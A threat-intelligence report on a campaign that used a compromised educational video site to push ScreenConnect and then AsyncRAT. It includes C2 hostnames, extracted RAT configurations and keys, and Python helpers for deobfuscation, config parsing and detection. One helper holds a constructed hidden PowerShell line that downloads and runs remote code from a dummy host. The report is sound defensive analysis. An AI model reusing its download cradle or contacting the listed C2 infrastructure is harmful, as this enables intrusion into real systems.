
Operation PhantomControl

BY eSentire Threat Response Unit (TRU)

August 3, 2023 | 6 MINS READ


In TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We outline how we responded to the confirmed threat and what recommendations we have going forward.

Here’s the latest from our TRU Team…

What did we find?

In July 2023, we received multiple alerts from BlueSteel, our machine-learning powered PowerShell classifier, on the execution of malicious PowerShell commands. Our Incident Handling Team identified ScreenConnect activity, which created numerous malicious files under the ProgramData folder.

Figure 1: Malicious files dropped under the ProgramData folder


The ScreenConnect client was downloaded from a compromised Teachflix website (the website hosts educational videos for the classroom).

Figure 2: Compromised Teachflix website delivering ScreenConnect


Upon visiting one of the pages, the user would get an error pop-up instructing them to download and launch the binary “teachflix.exe” to be able to browse through the website.

The error icon and the ScreenConnect binary are both stored under the /.well-known directory of the compromised site, as shown in Figure 3.

Figure 3: Snippet of the code responsible for serving the ScreenConnect binary


The threat actor(s) executed the 02.bat script via the ScreenConnect session. The batch script is responsible for launching the malicious PowerShell command.

Unfortunately, we were not able to retrieve the 02.bat script itself. After cleaning up the PowerShell command (Figure 5) and applying its string replacements, we can see that it retrieves the file “Coinfg.SVG” from the server.

Figure 4: Execution of the 01.bat file via ScreenConnect session


Figure 5: Malicious PowerShell command
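The command in Figure 5 hides its download URL behind PowerShell string replacements, which the TRU team resolved by hand. The following Python helper, added here as an example and not taken from the page or from the sample, automates that step: it finds a single-quoted literal followed by a chain of `-replace` operators or `.Replace()` calls, applies them in order (the `-replace` operator is a case-insensitive regex, `.Replace()` is literal), and then pulls URLs out of the cleaned command. The sample command, the `##`/`@` placeholders and the host `example.invalid` are constructed for the example; the real command and its hosting server were not reproduced on the page.

```python
import re

# Constructed command in the spirit of Figure 5: a download URL assembled with
# PowerShell string replacements. The real command, its placeholders and the
# hosting server were not reproduced on the page; example.invalid is a dummy host.
SAMPLE_COMMAND = (
    "powershell -w hidden -c \"$u=('h##ps://ex@mple.inv@lid/Coinfg.SVG' "
    "-replace '##','tt' -replace '@','a'); "
    "IEX (New-Object Net.WebClient).DownloadString($u)\""
)

# One replacement step: the -replace operator (regex, case-insensitive by default)
# or a .Replace() method call (literal match).
STEP_RE = re.compile(
    r"-replace\s*'([^']*)'\s*,\s*'([^']*)'"
    r"|\.replace\(\s*'([^']*)'\s*,\s*'([^']*)'\s*\)",
    re.IGNORECASE,
)
# A single-quoted literal followed by one or more replacement steps.
CHAIN_RE = re.compile(
    r"'([^']*)'((?:\s*-replace\s*'[^']*'\s*,\s*'[^']*'"
    r"|\s*\.replace\(\s*'[^']*'\s*,\s*'[^']*'\s*\))+)",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.IGNORECASE)


def resolve_chain(literal, steps):
    """Apply each replacement step to the literal, in the order PowerShell would."""
    value = literal
    for m in STEP_RE.finditer(steps):
        if m.group(1) is not None:
            # -replace: pattern is a regex; the replacement is inserted verbatim
            # (PowerShell's $1 group syntax is not emulated here).
            value = re.sub(m.group(1), lambda _match, rep=m.group(2): rep,
                           value, flags=re.IGNORECASE)
        else:
            value = value.replace(m.group(3), m.group(4))  # .Replace(): literal
    return value


def deobfuscate(command):
    """Rewrite every literal+replacement chain in the command into its final string."""
    return CHAIN_RE.sub(
        lambda m: "'" + resolve_chain(m.group(1), m.group(2)) + "'", command
    )


def extract_urls(command):
    """URLs visible once the replacement chains have been resolved."""
    return URL_RE.findall(deobfuscate(command))


if __name__ == "__main__":
    print(deobfuscate(SAMPLE_COMMAND))
    print(extract_urls(SAMPLE_COMMAND))
```

Run the helper over the command line captured from the PowerShell event (or the BlueSteel alert payload) rather than over the script file, since the script may itself be built at runtime; the recovered URL is then the indicator to block and to pivot on.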


The payload was hosted on a Plesk-managed website and had been uploaded to the server on July 12th. Through an open-source search we identified the webshell used on the server as WSO, a PHP webshell that is publicly available on GitHub. Our Threat Response Unit (TRU) discovered over 20 impacted websites, including ones that were at some point infected with the webshell and delivering ScreenConnect. On those sites as well, the binaries were located in the /.well-known directory.

Based on the naming conventions and infection patterns, we assess with high confidence that the same threat actor is behind Operation PhantomControl.

Figure 6: Coinfg.SVG payload


Figure 7: Example of another infected website


The SVG file is a PowerShell script that performs the following actions:

Figure 8: Cleaned-up snippet of the Coinfg.SVG script


Figure 9: PE responsible for process hollowing


Each file created under ProgramData does:

TRU was able to extract the configuration of the AsyncRAT (you can find the configuration extractor here):

InstallFolder: %AppData%
InstallFile:
Delay: 3
Hwid: null
Ports: 7707
Hosts: 3llah23.run[.]place
Version: | Edit 3LOSH RAT
Install: false
Key: Rlc2WlZTZktzenBUZjlxY3FuSERObFU3YTlKT1NWM2o=
MTX: AsyncMutex_pp5533
Certificate: [omitted]
ServerSignature: [omitted]
Anti: false
offlineKL: true
clipper: null
btc: false
eth: July23

TRU also observed two other attempts to retrieve the payload via the ScreenConnect session after executing the 01.bat script. One of the payloads was located at 212.11.196[.]183/~sytimes/C0nfig.jpg; however, at the time of this reporting, the host is down.

Another payload was retrieved via the “runing.exe” binary. We were not able to retrieve the binary as it had been removed. However, through open-source analysis, we assess with medium confidence that the binary is an AutoHotkey loader used to retrieve the secondary payload (in our case located at hxxp://moealalah.za[.]com/moealalah.jpg, which is no longer available). We were able to retrieve similar files from VirusTotal:

The configurations extracted from both payloads:

Sample: 1da8d6c16662e383b822b6bade1a22a8

InstallFolder: %AppData%
InstallFile:
Delay: 3
Hwid: null
Ports: 6606,7707,8808
Hosts: exos.mywire[.]org,esxo.ddnsfree[.]com
Version: | Edit 3LOSH RAT
Install: false
Key: RlJwM3pUdnZaREZmWGdxRWZ1dWxrdEZKWW5ZQnVWbm8=
MTX: AsyncMutex_x
Certificate: [omitted]
ServerSignature: [omitted]
Anti: false
offlineKL: true
clipper: null
btc: false
eth: Default

Sample: 8f9b33e897e2b0fdd0ff93ee7d98750b

InstallFolder: %AppData%
InstallFile:
Delay: 3
Hwid: null
Ports: 8808,5010
Hosts: r0nj.ooguy[.]com
Version: | Edit 3LOSH RAT
Install: false
Key: Y3hNMmN0YU9odDlldE9kenhtQ3d1RkwxZXpMNkZMWEY=
MTX: AsyncMutex_6SI8OkPnk
Certificate: MIIE8jCCAtqgAwIBAgIQAPeWQ4YJ3MvReCGwLzn7rTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjIwNDI1MDA0MTA5WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKT9nYYTjYTZhYg1tekZ8F29gsEIDgf8odvCbCmYKGGZZi2yND9NjtBXEMANM9PAXCyMapGvapDPbWgjYkLiMwVwa3kZRg7kLpXMpzInLQufe7Q587viilcsGDoVXmnf51SwsKPjSysZUpyayezUlJ1j6aXkZGnasiqJ7iKANdSneQducOn6IwaEuJBmpXKWxhhq8R9JMfiWeOXLhXoEwCzwzvUCrzPXd3uMsLfFMDHZJOQ9OXKUCHZNCgSPs4VSgCgM4eK0YTbu1mLsWSo5th3ingNFaTyYmGsmLIE2Jq5AR1AxAFEdC8zKL1bAwYQcRgIJs7QdedtAIufepPZ9D5HiOiy3ITYVonqwTiiIm20en7UICtJ8iDb4M2Q2iLWA7Yi9PN2cr0Xrs8A4RL29Qe5Ly2k35i74RiBTiT7Jbl2r7PcYlUGcjTCbdB9PWt3dYaTysuamoq2Zuo2HVRhhoZpwnajS9vNcjuZCYVoQvUQBUnHTeRZrtHXU5JV59ZBlu7flZneMZnbrWXTxob6Bdt8hrGoSDMWBFcO4jRzhT3hEFUpu4lSFeb9T3Vx4KWkHJhHtMvHuYgDTXERdEcI00sOUbVxgd62LhGXNNommQKCyiAGj0V5uLD73Fyw8vJpm3jXf3NgNtCjnlaMc40DJHlXE5AgMBAAGjMjAwMB0GA1UdDgQWBBQsT2WvtxGUK29SWs4sHz1xYye0fzAPBgNVHRMBAf8EBTADAQHMA0GCSqGSIb3DQEBDQUAA4ICAQCK5sVfnYyT5MqnCg3uHV2ojf12fIVFCY02Cc7gy3DVoE6xZCPjr22VxZunZ7DG1nt0kOJKDwdQYnGoMc5UPh8jbNRoc1ojLOCaluaIYQyl8AGkmUSRA3Ltk0XetDescffrWTnKuRvIEYU4RaB39f8ouGMCa7VXaxnGJ0z0BkUie8KsDLgNmJ7kVfIYuRxlYefoCsUTCogqf0fu3DuRHBpUVaSQQOf9YCbvFWH7Nupc3UIwpH5D8kSdpKusEfbRp8nfWNFmlzF3THeHU6vNJ5UoAWHYFW8wfJCbzQ0L8QZeOv4uy74oQP2Ed0RdrWCwUL6SSsDPZdDEOy4K4vVYkDTl1nL5tleATguELAEbbT42oLce85z4C7sKvpEfa4DPbU55xBLwvHniILFfjB7VVsrgVckULlEf4Y92uJVKvLGruQtmtKSqIuJjD8T9y7RIsk6g9624egV5UtLtv36kLKhgIJlqC7XxPVwMc2yw8BiQlvxQZgqSd1k7QmV1AhV3z2wqnYmb09ibTMYaMFjtamFegeFqc4jRLABhVQFEFv8z5E6G9vgKn5mQDWSJykARBv9o2BjLPTADfwAtc1b4nWo0lCI8IjjYXumJOuwRkFJ19INtwbffQvT9U12t4smpcZVOK0opk4Yr9r1tZYm92ghXA
ServerSignature: [omitted]
Anti: false
offlineKL: false
clipper: null
btc: false
eth: GRACE
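The configuration dumps above (the one from the incident and the two VirusTotal samples) are what an analyst turns into indicators and detections. The following Python helper is an added example, not the TRU extractor the page links to and not code from the page. It parses a dump in the format printed above, expands the Hosts and Ports lists into the full set of C2 endpoints (an AsyncRAT client picks a host and a port from those lists, so every combination is a possible endpoint), refangs them, decodes the base64 Key into the passphrase the client feeds to PBKDF2, and reproduces the client's key derivation. The PBKDF2 salt and iteration count are taken from the public AsyncRAT source (Client/Helper/Aes256.cs: Rfc2898DeriveBytes over that salt, 50000 iterations, 32-byte AES key followed by a 64-byte HMAC key); the "Edit 3LOSH RAT" version string marks a modified build, so verify those constants against the sample before relying on the derived keys. The `eth` field is reported as a free-text tag only because the three dumps on this page carry campaign-like strings in it ("July23", "GRACE"); that is an observation from these samples, not a documented AsyncRAT feature.

```python
import base64
import hashlib
import itertools

# Constructed from the configuration dump printed on this page for sample
# 1da8d6c16662e383b822b6bade1a22a8 (Certificate/ServerSignature left out).
CONFIG_TEXT = """\
InstallFolder: %AppData%
InstallFile:
Delay: 3
Hwid: null
Ports: 6606,7707,8808
Hosts: exos.mywire[.]org,esxo.ddnsfree[.]com
Version: | Edit 3LOSH RAT
Install: false
Key: RlJwM3pUdnZaREZmWGdxRWZ1dWxrdEZKWW5ZQnVWbm8=
MTX: AsyncMutex_x
Anti: false
offlineKL: true
clipper: null
btc: false
eth: Default
"""

# PBKDF2 parameters from the public AsyncRAT source (Client/Helper/Aes256.cs).
# Assumption: the 3LOSH edit did not change them; check against the sample.
ASYNCRAT_SALT = bytes([
    0xBF, 0xEB, 0x1E, 0x56, 0xFB, 0xCD, 0x97, 0x3B,
    0xB2, 0x19, 0x02, 0x24, 0x30, 0xA5, 0x78, 0x43,
    0x00, 0x3D, 0x56, 0x44, 0xD2, 0x1E, 0x62, 0xB9,
    0xD4, 0xF1, 0x80, 0xE7, 0xE6, 0xC3, 0x39, 0x41,
])
ASYNCRAT_ITERATIONS = 50000


def parse_config(text):
    """Turn 'Key: value' lines into a dict; empty values (InstallFile:) stay empty."""
    cfg = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, value = line.split(":", 1)
        cfg[key.strip()] = value.strip()
    return cfg


def refang(indicator):
    """Undo the [.] defanging used in reports so the value matches live telemetry."""
    return indicator.replace("[.]", ".")


def c2_endpoints(cfg):
    """Every host:port the client could connect to (host list x port list)."""
    hosts = [refang(h.strip()) for h in cfg.get("Hosts", "").split(",") if h.strip()]
    ports = [int(p) for p in cfg.get("Ports", "").split(",") if p.strip()]
    return [f"{h}:{p}" for h, p in itertools.product(hosts, ports)]


def master_key(cfg):
    """The Key setting is base64 of the passphrase handed to PBKDF2."""
    return base64.b64decode(cfg["Key"]).decode("utf-8")


def derive_keys(passphrase):
    """Reproduce Rfc2898DeriveBytes(masterKey, Salt, 50000): the client reads
    32 bytes (AES-256 key) and then 64 bytes (HMAC-SHA256 key) from one stream."""
    stream = hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("utf-8"), ASYNCRAT_SALT, ASYNCRAT_ITERATIONS, 96
    )
    return stream[:32], stream[32:]


def summarize(cfg):
    """Analyst-facing view of the settings that matter for response."""
    return {
        "endpoints": c2_endpoints(cfg),
        "mutex": cfg.get("MTX"),
        "persistence": cfg.get("Install") == "true",   # Install=false: no install/persistence routine
        "offline_keylogger": cfg.get("offlineKL") == "true",
        "anti_analysis": cfg.get("Anti") == "true",
        "tag": cfg.get("eth"),  # free-text slot; campaign-like values in this page's samples
    }


if __name__ == "__main__":
    cfg = parse_config(CONFIG_TEXT)
    print(summarize(cfg))
    aes_key, hmac_key = derive_keys(master_key(cfg))
    print(aes_key.hex(), hmac_key.hex())
```

The endpoint list is what goes into the network blocklist and the mutex into the host-based sweep; both dynamic-DNS C2 hosts resolve to whatever the operator points them at, so block the names rather than the addresses they resolved to on the day.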


The threat actor generated the ScreenConnect client using the ClickOnceRun option, so the small launcher the user runs downloads the actual client from the attacker-controlled ScreenConnect panel. In the case we observed, the attacker’s ScreenConnect instance was engineer53.screenconnect[.]com. Once the client was running, the attacker had full remote control of the victim’s machine.

Figure 10: Downloading ScreenConnect client from attacker's controlled panel
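Because the client was a legitimate, signed ScreenConnect build, the useful detection signal is not the binary but where it phones home and what it spawns. The following Python check is an added example, not code from the page or from eSentire: it takes process-creation events (Sysmon Event ID 1 style fields), extracts the ScreenConnect client launch parameters from the command line (the client is started with a query-string argument in which `h=` is the instance host, `p=` the port and `e=` the session type), flags any instance not on an allowlist, and separately flags script hosts such as cmd.exe spawned under a ScreenConnect client process, which is how the batch file in this incident was run. The events, file paths and session identifiers are constructed; the attacker instance name is the one reported above, written undefanged because real telemetry is not defanged. The allowlist entry `corp-helpdesk.screenconnect.com` is an assumption standing in for your organisation's own instance.

```python
import ntpath
import re
from urllib.parse import parse_qs

# Assumption: the ScreenConnect instance(s) your organisation actually operates.
ALLOWED_INSTANCES = {"corp-helpdesk.screenconnect.com"}

# Script hosts that a remote-control agent should not normally be spawning.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe",
                "wscript.exe", "cscript.exe", "mshta.exe"}

# Constructed process-creation events (Sysmon Event ID 1 style fields), not real telemetry.
# Install-directory hashes, session IDs and the batch file name are made up.
SAMPLE_EVENTS = [
    {   # client launched against the attacker's instance named on this page
        "Image": r"C:\Program Files (x86)\ScreenConnect Client (1a2b3c4d5e6f7a8b)\ScreenConnect.ClientService.exe",
        "CommandLine": r'"C:\Program Files (x86)\ScreenConnect Client (1a2b3c4d5e6f7a8b)\ScreenConnect.ClientService.exe" '
                       r'"?e=Access&y=Guest&h=engineer53.screenconnect.com&p=443'
                       r'&s=00000000-0000-0000-0000-000000000000&k=BgIAAACkAABSU0ExAAgAAAEAAQ"',
        "ParentImage": r"C:\Windows\System32\services.exe",
    },
    {   # client launched against the organisation's own instance
        "Image": r"C:\Program Files (x86)\ScreenConnect Client (9f8e7d6c5b4a3f2e)\ScreenConnect.ClientService.exe",
        "CommandLine": r'"C:\Program Files (x86)\ScreenConnect Client (9f8e7d6c5b4a3f2e)\ScreenConnect.ClientService.exe" '
                       r'"?e=Access&y=Guest&h=corp-helpdesk.screenconnect.com&p=443'
                       r'&s=11111111-1111-1111-1111-111111111111&k=BgIAAACkAABSU0ExAAgAAAEAAQ"',
        "ParentImage": r"C:\Windows\System32\services.exe",
    },
    {   # batch file executed through the remote session
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'cmd.exe /c "C:\ProgramData\stage.bat"',
        "ParentImage": r"C:\Program Files (x86)\ScreenConnect Client (1a2b3c4d5e6f7a8b)\ScreenConnect.ClientService.exe",
    },
]

# The client argument is a query string starting with e=; it is usually quoted.
ARGS_RE = re.compile(r'\?(e=[^"\s]+)')


def parse_client_args(cmdline):
    """Return the ScreenConnect launch parameters (e=session type, h=host, p=port, ...)."""
    m = ARGS_RE.search(cmdline)
    if not m:
        return {}
    return {k: v[0] for k, v in parse_qs(m.group(1)).items()}


def evaluate(event):
    """Findings for one process-creation event; empty list means nothing to flag."""
    findings = []
    image = ntpath.basename(event["Image"]).lower()
    parent = ntpath.basename(event["ParentImage"]).lower()

    if image.startswith("screenconnect."):
        params = parse_client_args(event["CommandLine"])
        host = params.get("h", "").lower()
        if host and host not in ALLOWED_INSTANCES:
            findings.append(
                f"ScreenConnect client connecting to unapproved instance {host} "
                f"(session type {params.get('e', '?')}, port {params.get('p', '?')})"
            )

    if parent.startswith("screenconnect.") and image in SCRIPT_HOSTS:
        findings.append(
            f"{image} spawned from a ScreenConnect session: {event['CommandLine']}"
        )
    return findings


def scan(events):
    """(index, findings) for every event that produced at least one finding."""
    hits = []
    for i, event in enumerate(events):
        findings = evaluate(event)
        if findings:
            hits.append((i, findings))
    return hits


if __name__ == "__main__":
    for i, findings in scan(SAMPLE_EVENTS):
        for f in findings:
            print(f"event {i}: {f}")
```

The instance allowlist is the part worth maintaining: ScreenConnect is common enough in IT environments that alerting on the binary alone is noisy, but a client pointed at an instance the organisation does not own is rarely benign, and the same query parameters are visible in the ClickOnce launcher's download URL (Figure 10) for a network-side version of the check.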

What did we do?

What can you learn from this TRU Positive?

Recommendations from our Threat Response Unit (TRU):

Indicators of Compromise

Name                                    Indicator
AsyncRAT                                37950f1c490168d8c52bde11799fa40b
AsyncRAT                                addfb71ffe786565f2e156fb5bb45f42
AsyncRAT                                bf96552cf18eb495d06ec007cef18831
AsyncRAT C2                             exos.mywire[.]org
AsyncRAT C2                             esxo.ddnsfree[.]com
AsyncRAT C2                             3llah23.run[.]place
AsyncRAT C2                             r0nj.ooguy[.]com
Coinfg.SVG                              fa176901cd6018b7a9516f3287fc5b75
HAZLOPTVICXEAQ.vbs                      d8b8486e376519aa4bfe152b7137df33
1.bat                                   c6c8b7cd095bf71cb47604b0b3d7e4b6
HAZLOPTVICXEAQ.ps1                      aa8a3ab5b73600904dd73664d338e27b
cgihvzm.ps1                             5093aa07dcead8ec112fe9ff80fc6499
teachflix.exe                           0716fa674efaed96bfe3cd96f991ccb3
Attacker’s ConnectWise instance         engineer53.screenconnect[.]com
Potential C2 for webshell               45.94.211[.]123

References
